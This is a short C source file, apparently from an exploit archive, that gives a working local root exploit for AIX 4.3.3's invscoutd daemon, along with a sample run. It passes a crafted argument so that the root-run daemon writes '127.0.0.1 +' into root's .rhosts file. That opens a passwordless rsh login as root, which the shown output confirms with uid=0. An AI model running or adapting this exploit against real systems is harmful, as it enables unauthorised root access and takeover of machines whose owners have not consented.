//
// AIX 4.3.3 /usr/sbin/invscoutd Local Root Exploit
// (Tested on ML9)
//
// BUG: File creation as root
//
//
// Sample exploitation: (It adds "127.0.0.1 +" to ~root/.rhosts)
//
//    $ gcc invscoutdx.c -o invscoutdx
//    $ ./invscoutdx
//    ROOT USER $HOME: /home/root
//    Inventory Scout Version 1.3.0.0
//    Logic Database Version 1.3.0.0
//    Exit code 2, pid 536967976.
//    $ rsh 127.0.0.1 -l root id
//    uid=0(root) gid=0(system) groups=2(bin),3(sys),7(security),8(cron),10(audit)
//
//
// darkraver@t0s.org
// 16/10/2003
//

#include <pwd.h>
#include <stdio.h>

main(int argc, char **argv) {
  char buf[]="\n127.0.0.1 +\n";
  char path[256];
  char *ptr;

  ptr=(char *)getpwuid(0);

  ptr=((struct passwd *)ptr)->pw_dir;

  printf("ROOT USER $HOME: %s\n", ptr);

  fflush(stdout);

  strncpy(path, ptr, 240);

  strcat(path, "/.rhosts");

execl("/usr/sbin/invscoutd", buf, path, 0);

}